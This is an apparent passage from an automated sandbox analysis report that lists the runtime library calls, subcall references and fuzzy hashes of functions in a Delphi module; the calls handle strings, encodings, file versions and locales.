                                                                                                  • API ID: System@$Unicode$System@@$String$Stringx20$LoadRaiseRecxiStringpx14Sysutils@Text$qqrxusTypeVariants@$Asg$qqrr20Cat3$qqrr20Except$qqrvException@$bctr$qqrx20String$qqrp20Stringt2$CharClassClassoCreate$qqrp17Error$qqrucFindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3925043654-0
                                                                                                  • Opcode ID: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                  • Instruction ID: 4ca92997f7d99f258bade771785e71a5bab742ac08337daf03ab8f9c2463306d
                                                                                                  • Opcode Fuzzy Hash: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                  • Instruction Fuzzy Hash: 11212A749056888FEB05CBE8E891AEEB7F5EB58300F40866AE904A3341D7749A058BA1
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 500160A1
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500160F4
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016157
                                                                                                  • CharUpperBuffA.USER32(?,00000100), ref: 500161CB
                                                                                                  • @System@@UniqueStringA$qqrr27System@%AnsiStringT$us$i0$%.RTL120(?,00000100), ref: 500161D3
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,00000100), ref: 500161F4
                                                                                                  • CharUpperBuffA.USER32(00000000,?,?,00000100), ref: 50016204
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016266
                                                                                                  • @System@@EnsureAnsiString$qqrr27System@%AnsiStringT$us$i0$%us.RTL120 ref: 500162A8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50016309), ref: 500162FC
                                                                                                  • API ID: System@@$AnsiString$System@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$BuffCharUpper$A$qqrr27Clr$qqrpvEnsureRef$qqrpvString$qqrr27T$us$i0$%T$us$i0$%usUnique
                                                                                                  • String ID:
                                                                                                  • API String ID: 3754126448-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016423
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016472
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 500164B2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 500164D1
                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,500165BA), ref: 500164E1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016536
                                                                                                  • @Character@TCharacter@IsLetterOrDigit$qqrb.RTL120(00000000,500165BA), ref: 50016561
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 5001656F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUnicode$System@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$BuffCharDigit$qqrbEnsureLetterString$qqrr20U$qqrr20UniqueUpper
                                                                                                  • String ID:
                                                                                                  • API String ID: 725871508-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A88E), ref: 5000A716
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5000A88E), ref: 5000A736
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A75D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A78A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A7C4
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120 ref: 5000A83E
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120 ref: 5000A843
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001), ref: 5000A870
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Unicode$StringSystem@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$ArrayLength$qqrv$EnsureLen$qqrx20String$qqrr20
                                                                                                  • String ID:
                                                                                                  • API String ID: 4245238830-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C518
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C52D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C54A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C572
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C59B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5B8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5D7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$AnsiFromStr$qqrr20Stringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi$Builder@set_Length$qqriSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2984213798-0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001018B), ref: 5001008E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100AB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100E3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001018B), ref: 50010114
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001018B), ref: 50010119
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 50010136
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001018B), ref: 50010142
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5001018B), ref: 50010150
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$AnsiCharacter@FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1528459219-0
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D402
                                                                                                    • Part of subcall function 5002DF70: @Sysutils@TUnicodeEncoding@$bctr$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF82
                                                                                                    • Part of subcall function 5002DF70: InterlockedCompareExchange.KERNEL32(500A6CA4,00000000,00000000), ref: 5002DF92
                                                                                                    • Part of subcall function 5002DF70: @System@TObject@Free$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF9D
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D38D
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D396
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D3A1
                                                                                                  • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D41D
                                                                                                  • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D426
                                                                                                  • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D441
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D482
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4A6
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(5002D4D5,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$ArrayLength$qqrvSysutils@$Encoding@Unicode$qqrv$Endian$Array$qqrpvt1uiCompareEncoding@$bctr$qqrvExchangeFinalizeFree$qqrvInterlockedObject@System@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 84035370-0
                                                                                                  • Opcode ID: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                  • Instruction ID: 039153d2115dfd61d257ebf5085e828ad7449732c8b2836f1213e2f1a0251a10
                                                                                                  • Opcode Fuzzy Hash: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                  • Instruction Fuzzy Hash: 7E31AC745029869FDB04FFA0F49156DB3B5EF99310B2042A7F8019B355DB30AD03DAE2
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BAC9
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAF8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAFD
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB20
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB25
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002BB82), ref: 5002BB31
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BB4E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002BB82), ref: 5002BB67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$System@@$AnsiFromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Unicode$Except$qqrvException@$bctr$qqrp20InternalRaiseRecpx14Recxi$Builder@set_Length$qqriMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2643269361-0
                                                                                                  • Opcode ID: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                  • Instruction ID: 9b41787f5445ca965e8b445f3d3e889d29c8efd9642bd8e15586ab18e8b0b9b5
                                                                                                  • Opcode Fuzzy Hash: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                  • Instruction Fuzzy Hash: 1931A430A011869FDB11DFA8ED91AADB7F9EF94304F54C2A6E50097256DB70EE04CBD0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50027676), ref: 500275C8
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,50027676), ref: 500275D0
                                                                                                    • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                    • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                    • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50027676), ref: 500275DC
                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,50027676), ref: 500275E2
                                                                                                  • @System@@GetMem$qqri.RTL120(00000000,?,00000000,50027676), ref: 500275EF
                                                                                                    • Part of subcall function 50003FB0: @System@SysGetMem$qqri.RTL120 ref: 50003FB4
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027611
                                                                                                  • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027617
                                                                                                  • VerQueryValueW.VERSION(?,50027688,?,?,00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027631
                                                                                                  • @System@@FreeMem$qqrpv.RTL120(50027660,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027653
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Unicode$String$Char$qqrx20FileFreeInfoMem$qqriMem$qqrpvVersion$Asg$qqrr20Move$qqrpxvpviQuerySizeString$qqriString$qqrr20Stringx20UniqueValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340374955-0
                                                                                                  • Opcode ID: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                  • Instruction ID: 20c290cfac2a6ec53872fbffc8a20628a873dcac3785a9ff7ef993043faeba55
                                                                                                  • Opcode Fuzzy Hash: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                  • Instruction Fuzzy Hash: 69215871A0568AAFDB01DFE9ED51C6EB7FCEF49200B914672B504E3251D734AE04C690
                                                                                                  APIs
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(00000000,50006B69), ref: 50006B08
                                                                                                    • Part of subcall function 50006AC4: @System@UTF8ToString$qqrrx28System@%SmallString$iuc$255%.RTL120 ref: 50006AD1
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B10
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B15
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,50006B69), ref: 50006B1E
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B27
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B2C
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,00000000,50006B69), ref: 50006B35
                                                                                                  • CompareStringW.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,00000000,50006B69), ref: 50006B43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$System@@$Char$qqrx20EnsureLen$qqrx20String$qqrr20System@%$AnsiClassCompareFromInternalName$qqrvObject@SmallStr$qqrr20String$iuc$255%String$qqrrx28Stringx27T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2698194505-0
                                                                                                  • Opcode ID: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                  • Instruction ID: 07edf7bba6b7798c112338542bf63ced82e12cf919ecdcd04dcacc31e71116a0
                                                                                                  • Opcode Fuzzy Hash: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                  • Instruction Fuzzy Hash: 9D017174505288AFEB10EBE4EC6299EB7BCEF59310F904677B404E3652DB30AA009696
                                                                                                  APIs
                                                                                                    • Part of subcall function 500123E4: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(?,500145C0), ref: 500123F0
                                                                                                    • Part of subcall function 500123E4: @System@@RaiseExcept$qqrv.RTL120(?,500145C0), ref: 500123F5
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014D27
                                                                                                  • @Math@LnXP1$qqrxg.RTL120(?,?,?), ref: 50014D6E
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014D7C
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014D9B
                                                                                                  • @System@Ln$qqrxg.RTL120 ref: 50014E8F
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014F05
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exp$qqrxg$Except$qqrvException@$bctr$qqrx20Ln$qqrxgMath@P1$qqrxgRaiseStringSystem@@Sysutils@Unicode
                                                                                                  • String ID: InterestRate
                                                                                                  • API String ID: 309294142-3580794093
                                                                                                  • Opcode ID: 124f8ed047251f2e0df9bb2f8c7ea5488eeba9d01d2cc3390b6a8d904b7b764a
                                                                                                  • Instruction ID: d6d9cfc9d9be970d20f1fa582e04d4b86400008520249d3d5693622e2192696a
                                                                                                  • Opcode Fuzzy Hash: 124f8ed047251f2e0df9bb2f8c7ea5488eeba9d01d2cc3390b6a8d904b7b764a
                                                                                                  • Instruction Fuzzy Hash: D7C19660E091AD9ADF619BF4DC546CDBFB0FF05A00F15469BE8E8B3256E63249A1CF40
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025C48
                                                                                                    • Part of subcall function 50025BF0: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?), ref: 50025C0C
                                                                                                    • Part of subcall function 50025BF0: @System@LoadResString$qqrp20System@TResStringRec.RTL120 ref: 50025C1E
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025C7D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025CA0
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025CEE
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025D13
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20Stringx20$Locale$FreeLoadMem$qqrpvMove$qqrpxvpviStr$qqriix20String$qqriString$qqrp20Sysutils@Thread
                                                                                                  • String ID: ,lP$kP
                                                                                                  • API String ID: 2884738061-2562396607
                                                                                                  • Opcode ID: 1e640ef11e0d861ae4c35bea9addde5ea34473f93be08e639f16d76bd6c0e43e
                                                                                                  • Instruction ID: 16dec81e5f93945b5e2b83e1c7f6ec167d3ec98a1fb52082471023d7d843a8a0
                                                                                                  • Opcode Fuzzy Hash: 1e640ef11e0d861ae4c35bea9addde5ea34473f93be08e639f16d76bd6c0e43e
                                                                                                  • Instruction Fuzzy Hash: 8131E871B411496BDB04CAC4EC91FBF73AADB98310F914627F905DB341DA39ED0183A5
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C580), ref: 5001C503
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C580), ref: 5001C52A
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C580), ref: 5001C550
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5001C580), ref: 5001C55D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$Cat3$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt2Stringx20
                                                                                                  • String ID: .\:
                                                                                                  • API String ID: 2717076658-496007442
                                                                                                  APIs
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,B",?,?,?,00000000), ref: 50005949
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,B",?,?,?,00000000), ref: 50005952
                                                                                                  • MoveFileW.KERNEL32(00000000), ref: 50005958
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,B",?,?,?,00000000), ref: 5000597D
                                                                                                  • @System@SetInOutRes$qqri.RTL120(00000000,?,00000000,B",?,?,?,00000000), ref: 50005982
                                                                                                  • @System@SetInOutRes$qqri.RTL120(00000000,B",?,?,?,00000000), ref: 5000598E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
